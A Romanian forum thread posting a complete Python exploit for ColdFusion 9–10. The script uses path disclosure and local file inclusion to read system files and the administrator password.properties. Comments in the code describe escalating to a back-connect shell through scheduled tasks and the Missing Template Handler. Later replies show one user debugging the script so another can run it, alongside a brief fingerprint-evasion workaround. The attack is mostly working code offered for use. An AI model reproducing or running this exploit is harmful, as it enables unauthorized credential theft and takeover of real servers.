ColdFusion 9-10 - Credential Disclosure Exploit

[M2G]

#!/usr/bin/env python
# -*- coding: utf-8 -*-

intro="""
 _     _ _______  _____       _    _ _______        Cold        ,''' Fusion
 |_____|    |    |_____]       \  /  |______        Cold ,'''  /--   Fusion
 |     |    |    |              \/   ______|.       Cold -,__,'      Fusion

Name        : ColdSub-Zero.pyFusion v2
Description : CF9-10 Remote Root Zeroday
Crew        : HTP
"""
cyan = "\x1b[1;36m"
red = "\x1b[1;31m"
clear = "\x1b[0m"
print intro.replace("Cold",cyan).replace("Fusion",clear)

import requests, time, sys, urllib, hashlib

def flash(color,text,times):
    sys.stdout.write(text)
    line1 = "\x0d\x1b[2K%s%s" % (color,text)
    line2 = "\x0d\x1b[2K%s%s" % (clear,text)
    for x in range(0,times):
        sys.stdout.write(line1)
        sys.stdout.flush()
        time.sleep(.2)
        sys.stdout.write(line2)
        sys.stdout.flush()
        time.sleep(.2)
    print line2

abspath = ""
operatingsystem = "refrigerator"
coldfusion = 0

def fingerprintcf(protocol,target):
    # Fingerprint using md5's of CF 9/10 admin image
    print "[*] Fingerprinting CF 9/10 instance"
    imgdata = requests.get("%s://%s/CFIDE/administrator/images/loginbackground.jpg" % (protocol,target)).content
    md5fingerprint = hashlib.md5(imgdata).hexdigest()
    if md5fingerprint == "a4c81b7a6289b2fc9b36848fa0cae83c":
        print "[*] Detected ColdFusion 10"
        return 10
    elif md5fingerprint == "596b3fc4f1a0b818979db1cf94a82220":
        print "[*] Detected ColdFusion 9"
        return 9
    elif md5fingerprint == "779efc149954677095446c167344dbfc":
        # ColdFusion 8 doesn't have mail.cfm, but it is still exploitable due to l10n parsing the template as CFM.
        # It would require shell data to be on the box to include, such as an uploaded 'picture' or what-not.
        print "[*] Requires inclusion: m4ke your 0wn fuq1ng z3r0d4y!"
        sys.exit(0)
    else:
        print "[*] Unable to fingerprint, continuing with little environment data"
        return None

def getpath(protocol,target):
    # Leverage a path disclosure to get the absolute path on CF9-10
    print "[*] Testing for path disclosure"
    abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
    if "set-cookie" in abspathdata.keys():
        try:
            abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
            print "[*] Absolute path obtained: %s" % abspath
            if abspath[0] == "/":
                print "[*] Detected Linux"
                operatingsystem = "linux"
            elif abspath[1] == ":":
                print "[*] Detected Windows"
                operatingsystem = "windows 95 with bonzibuddy"
            else:
                print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
                operatingsystem = "refrigerator"
        except:
            print "[?] OS detection failure. Continuing with fingerprint."
    else:
        print "[?] OS detection failure. Continuing with fingerprint."
    return abspath,operatingsystem

# HTP '13
# Congratulations, you're reading the source.
#
# Subzero v2 is a do-it-yourself Subzero v1. Some details have been provided throughout the source hinting at the potential usage.
# As far as changes, the Null RDS 1day has been removed, as well as the locale + FCKEditor exploitation checks & auth bypass + shell drop.
# If you know what you are doing, this 0day can be used in conjunction with the other 0days to exploit ColdFusion 6-10. (aka everything).
#
# ColdFusion 6 can be taken out with the locale 0day, and XORing password.properties against the stored private key will yield the actual
# login password.
#
# Since you're reading the source, we'll give you another 0day to improve Subzero. Once Subzero has extracted the hash, use scheduled tasks
# to store your backconnect shell in a temp directory (such as the CF temp directory/windows TEMP dir or /dev/shm). Then, use Server Settings
# > Settings in the CF admin to load it as the Missing Template Handler (you can travel upwards from the 'relative path' using ../). Finally,
# trigger a 404 to recieve your backconnect, and restore the Missing Template Handler. We might release fUZE Shell v2 in the future for POCs
# of this written in CFML.
#
# For anyone looking to fully weaponize Subzero into direct RXE for ColdFusion 10, we'll give you a hint. Subzero is a LFI, not a LFD.
# (preinstalled *.cfm) 

target = raw_input("Target> ")
if "https" in target:
    protocol = "https"
    target = target.replace("http://","").replace("https://","").split("/")[0]
    print "[*] Target set to: %s" % target
    print "[*] HTTPS: Enabled"
else:
    protocol = "http"
    target = target.replace("http://","").replace("https://","").split("/")[0]
    print "[*] Target set to: %s" % target

abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)

print "[*] Collecting additional data about operating system"
etchosts = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
bootini = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
if "hosts" in etchosts or "127.0.0.1" in etchosts:
    operatingsystem = "linux"
elif "[boot loader]" in bootini or "[operating systems]" in bootini:
    operatingsystem = "windows 95 with bonzibuddy"
elif operatingsystem is "linux" or "windows 95 with bonzibuddy":
    pass
else:
    operatingsystem = "refrigerator"

if operatingsystem is "refrigerator":
    print "[*] go0d 1uq!!"

print "[*] Obtaining credentials"
tests = ["../../lib/password.properties","..\..\lib\password.properties"]
if operatingsystem is "windows 95 with bonzibuddy":
    if coldfusion == 10:
        tests += ["..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
    elif coldfusion == 9:
        tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
    else:
        tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
elif operatingsystem is "linux":
    if coldfusion == 10:
        tests += ["../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
    elif coldfusion == 9:
        tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
    else:
        tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
elif operatingsystem is "refrigerator":
    # w3lp l00ks l1k3 w3 g0tt4 5h0tguN th1s sh1t
    tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties",
                  "../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                  "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                  "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]

for path in tests:
    lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content
    if "encrypted=true" in lfidata:
        credzacquired = True
        print "[*] CF Administrator credentials acquired:"
        print lfidata
    else:
        pass

if credzacquired == True:
    flash(cyan,"[~] SUB ZERO WINS",3)
    time.sleep(.5)
    flash(red,"[!] FLAWLESS VICTORY",3)
    time.sleep(.5)
else:
    flash(red,"[!] COLDFUSION ADMIN WINS",3)
    time.sleep(.5)

# e0f HTP '13

Nu am citit intreg codul dar la un momentdat face niste verificari pe /CFIDE/administrator/images/loginbackground.jpg" si ii ia hash-ul MD5 pentru a determina versiunea 8, 9 10.

Ca un workaround, puteti sa schimbati cativa pixeli din poza aceea pentru a genera un hash diferit astfel ca versiunea sa nu poata fi descoperita prin tehnica asta.

Defapt coldfusion = fingerprintcf(protocol,target) pune in variabila coldfusion versiunea gasita pe care o foloseste mai departe. Daca schimbati cativa pixeli din acea poza, functia o sa returneze None de fiecare data si exploitul nu mai poate sa fie folosit.

Corectati-ma daca gresesc.

ColdFusion 9-10 - Credential Disclosure Exploit

Edited May 8, 2013 by M2G

[florin_darck]

L-ai testat ?

Poate fac eu ceva gresit. nu ma pricep la python.

[M2G]

Nu ai instalat modulul requests, dupa cum spune si eroarea.

Sursa Modul: https://github.com/kennethreitz/requests

Modul: https://pypi.python.org/pypi/requests

[florin_darck]

Am reusit cu requests.

But now what ?

http://i.imgur.com/MQARyKS.png

[M2G]

Pai ai bucla

for path in tests:
    lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content
    if "encrypted=true" in lfidata:
        credzacquired = True
        print "[*] CF Administrator credentials acquired:"
        print lfidata
    else:
        pass

Ai acolo un requests.get, http://docs.python-requests.org/en/latest/user/quickstart.html#make-a-request Te uiti in documentatie sa vezi ce face toata sintaxa aia din script.

Mai jos iti ferifica daca gaseste stringul "encrypted=true" in pagina returnata de request.get.

Daca stringul este gasit, iti declara variabila credzacquired la TRUE si le printeaza credentialele adica ceea ce contine lfidata.

Mai jos este doar un text de showoff, printeaza niste stringuri "SUB ZERO WINS" etc.

Ca sa vezi ce se intampla poti sa stergi liniile de la 176 in jos ca sa nu mai dea eroare sau poti declara variabila credzacquired mai sus de bucla for ca sa fie in scope-ul if-ului de mai jos.

Daca nu ti-a intrat in acea bucla cred ca altceva e problema. Fa putin debuging.

pune un

print path

chiar urmatoarea linie dupa

for path in tests:

ca sa vezi ce intrari ai in lista tests.

Mai poti pune un print lfidata in bucla else ca sa vezi ca contine lfidata in cazul in care nu gaseste "encrypted=true" in lfidata

Edited May 8, 2013 by M2G

[florin_darck]

Multumesc de informatii !